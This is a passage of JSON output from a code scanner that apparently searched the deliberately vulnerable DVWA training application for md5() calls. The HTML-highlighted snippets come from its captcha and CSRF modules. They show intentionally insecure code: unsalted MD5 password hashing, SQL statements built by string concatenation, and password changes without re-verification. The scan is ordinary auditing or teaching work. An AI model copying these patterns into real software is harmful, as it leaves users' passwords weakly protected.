function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 112,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span 
class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token 
variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 19,
  "start": 14,
  "end": 25,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 113,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">24:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd 
party\n<span class=\"line-number\">27:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">29:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
  "line": 24,
  "start": 19,
  "end": 30,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 125,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">52:</span> \n<span class=\"line-number\">53:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> both password match\n<span class=\"line-number\">54:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">55:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">57:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">58:</span> \n<span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"line-number\">60:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span 
class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">62:</span> ",
  "line": 57,
  "start": 52,
  "end": 63,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 137,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">60:</span> \n<span class=\"line-number\">61:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> both password match\n<span class=\"line-number\">62:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">63:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">64:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">65:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">66:</span> \n<span class=\"line-number\">67:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"line-number\">68:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span 
class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">69:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">70:</span> ",
  "line": 65,
  "start": 60,
  "end": 71,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 148,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"line-number\">18:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span 
class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> ",
  "line": 15,
  "start": 10,
  "end": 21,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 156,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise current password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token 
